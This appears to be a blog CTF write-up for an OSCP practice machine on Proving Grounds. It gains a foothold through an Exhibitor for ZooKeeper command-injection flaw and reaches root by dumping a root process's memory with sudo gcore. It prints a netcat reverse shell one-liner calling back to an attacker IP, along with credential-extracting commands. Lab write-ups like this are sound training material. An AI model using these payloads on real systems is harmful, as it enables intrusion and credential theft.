← Back to Blog

OSCP Prep Machine 003

Type: CTF Writeup Platform: Proving Grounds Difficulty: Intermediate
OSCP RCE ZooKeeper gcore Memory Dump

This is an overview of my methods in rooting a machine from Proving Grounds. Machine names are purposefully omitted to avoid spoilers.

Enumeration

Port Scans:

PORT     STATE SERVICE
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
631/tcp  open  ipp
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap

SMB vulnerability check revealed a DoS vulnerability:

smb-vuln-regsvc-dos: VULNERABLE

Web Exploitation

After discovering a webserver running on port 8081, I found a portal for "Exhibitor for ZooKeeper." Googling revealed this software is vulnerable to RCE.

Potential Exploit: ExploitDB 48654

Exhibitor RCE

The PoC says to navigate to the config tab and enter a reverse shell surrounded with $()

$(/bin/nc -e /bin/sh 192.168.49.133 4444 &)

After entering this in the javascript.env field and committing, a reverse shell was obtained.

Foothold Summary

  1. Scan reveals web server on 8081
  2. Exhibitor for ZooKeeper is vulnerable to RCE
  3. RCE leads to reverse shell

Privilege Escalation

Running basic privesc enumeration commands:

find . -perm /4000 2>/dev/null
ps aux | grep root
sudo -l

Running sudo -l returned interesting results:

User may run the following commands:
    (ALL) NOPASSWD: /usr/bin/gcore

gcore Memory Dump

gcore produces memory dumps and with sudo privileges, it's possible to dump processes running under privileged users, potentially exposing passwords.

A "password-store" process was found running as root:

$ ps -ef
root  493  1  0 14:13 ?  00:00:00 /usr/bin/password-store

$ sudo gcore 493

$ strings core*

001 Password: root:
##PASSWORD##

After dumping the process and running strings, the root password was discovered:

$ su root
$ cat proof.txt
# Root flag obtained!